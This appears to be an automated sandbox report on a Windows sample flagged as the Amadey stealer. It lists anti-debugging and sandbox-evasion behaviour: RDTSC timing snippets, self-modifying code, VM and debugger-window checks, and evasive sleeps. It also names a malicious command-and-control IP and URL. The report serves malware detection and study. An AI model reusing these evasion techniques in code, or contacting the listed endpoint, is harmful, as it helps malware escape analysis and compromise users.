Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601E0 second address: 4B60246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5ECh 0x00000008 mov ecx, 643002E1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 jmp 00007F3A9502B5ECh 0x00000016 push eax 0x00000017 pushad 0x00000018 movsx edx, ax 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d jmp 00007F3A9502B5EFh 0x00000022 mov esi, dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3A9502B5EEh 0x0000002e jmp 00007F3A9502B5F5h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60246 second address: 4B60263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3A94CD4087h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60263 second address: 4B60286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007F3A9502B5F2h 0x0000000d mov dword ptr [esp], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60286 second address: 4B6028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B603A4 second address: 4B603F3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2ECFB96Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov dh, ah 0x0000000c pushfd 0x0000000d jmp 00007F3A9502B5F7h 0x00000012 and cx, 71AEh 0x00000017 jmp 00007F3A9502B5F9h 0x0000001c popfd 0x0000001d popad 0x0000001e popad 0x0000001f test byte ptr [esi+48h], 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B603F3 second address: 4B603F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B603F9 second address: 4B603FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50716 second address: 4B5071C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B5071C second address: 4B50720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50720 second address: 4B50787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 mov dh, 1Ah 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F3A94CD4083h 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F3A94CD4086h 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3A94CD4087h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50787 second address: 4B507CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov bx, 5E46h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and esp, FFFFFFF8h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F3A9502B5F9h 0x00000018 xor si, 77A6h 0x0000001d jmp 00007F3A9502B5F1h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B507CA second address: 4B50823 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F3A94CD407Ch 0x0000000c add eax, 1F97B548h 0x00000012 jmp 00007F3A94CD407Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3A94CD4084h 0x00000021 adc cx, 77A8h 0x00000026 jmp 00007F3A94CD407Bh 0x0000002b popfd 0x0000002c movzx eax, bx 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50823 second address: 4B50827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50827 second address: 4B5082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B5082D second address: 4B50873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 29D453ABh 0x00000008 pushfd 0x00000009 jmp 00007F3A9502B5F0h 0x0000000e sub eax, 59ADE538h 0x00000014 jmp 00007F3A9502B5EBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3A9502B5F5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50873 second address: 4B50883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50883 second address: 4B50892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50892 second address: 4B50896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50896 second address: 4B5089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B5089A second address: 4B508A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B508A0 second address: 4B5094D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A9502B5EEh 0x00000013 xor si, 6458h 0x00000018 jmp 00007F3A9502B5EBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F3A9502B5F8h 0x00000024 sub ax, EEB8h 0x00000029 jmp 00007F3A9502B5EBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 mov al, 23h 0x00000036 jmp 00007F3A9502B5F1h 0x0000003b popad 0x0000003c sub ebx, ebx 0x0000003e jmp 00007F3A9502B5F7h 0x00000043 test esi, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F3A9502B5F5h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B5094D second address: 4B509DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F3B07529AADh 0x00000010 pushad 0x00000011 push edi 0x00000012 call 00007F3A94CD4080h 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3A94CD4082h 0x0000002e add ecx, 16C2DF68h 0x00000034 jmp 00007F3A94CD407Bh 0x00000039 popfd 0x0000003a jmp 00007F3A94CD4088h 0x0000003f popad 0x00000040 popad 0x00000041 mov ecx, esi 0x00000043 pushad 0x00000044 mov esi, 1B78B39Dh 0x00000049 mov edx, eax 0x0000004b popad 0x0000004c je 00007F3B07529A4Fh 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F3A94CD407Bh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B509DD second address: 4B509E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B509E4 second address: 4B50A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [77436968h], 00000002h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A94CD407Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50A00 second address: 4B50A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F3B07880F8Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Special instruction interceptor: First address: 1CEA2E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Special instruction interceptor: First address: 378365 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Special instruction interceptor: First address: 1CEA22 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Special instruction interceptor: First address: 3F7884 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: C4EA2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: DF8365 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: C4EA22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: E77884 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Code function: 1_2_04BD02BD rdtsc 1_2_04BD02BD
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 445 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 2811 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 2914 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 966 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 601 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5780 Thread sleep count: 64 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5780 Thread sleep time: -128064s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804 Thread sleep time: -106053s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6656 Thread sleep count: 445 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6656 Thread sleep time: -13350000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6992 Thread sleep time: -720000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4368 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4368 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460 Thread sleep count: 2811 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460 Thread sleep time: -5624811s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356 Thread sleep count: 2914 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356 Thread sleep time: -5830914s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356 Thread sleep count: 966 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356 Thread sleep time: -1932966s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460 Thread sleep count: 601 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460 Thread sleep time: -1202601s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: axplong.exe, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 9ICG2PuZbG.exe, 00000001.00000002.2156468731.000000000034E000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2186759224.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2186680442.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@C)
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Code function: 1_2_04BD02BD rdtsc 1_2_04BD02BD
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C1645B mov eax, dword ptr fs:[00000030h] 9_2_00C1645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C1A1C2 mov eax, dword ptr fs:[00000030h] 9_2_00C1A1C2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: axplong.exe, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: ,cDProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BFD312 cpuid 9_2_00BFD312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BFCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 9_2_00BFCB1A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BE65B0 LookupAccountNameA, 9_2_00BE65B0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 1.2.9ICG2PuZbG.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2156374942.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2116109167.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2723052390.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2186588517.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2145696772.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2145827348.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2186678248.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1483403 Sample: 9ICG2PuZbG.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 24 Multi AV Scanner detection for domain / URL 2->24 26 Found malware configuration 2->26 28 Antivirus detection for URL or domain 2->28 30 7 other signatures 2->30 6 9ICG2PuZbG.exe 5 2->6         started        10 axplong.exe 12 2->10         started        13 axplong.exe 2->13         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\axplong.exe, PE32 6->18 dropped 20 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 axplong.exe 6->15         started        22 185.215.113.16, 49720, 49721, 49722 WHOLESALECONNECTIONSNL Portugal 10->22 38 Hides threads from debuggers 10->38 40 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->40 42 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->42 file5 signatures6 process7 signatures8 44 Antivirus detection for dropped file 15->44 46 Multi AV Scanner detection for dropped file 15->46 48 Detected unpacking (changes PE section rights) 15->48 50 6 other signatures 15->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.16/Jo89Ku7d/index.php true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown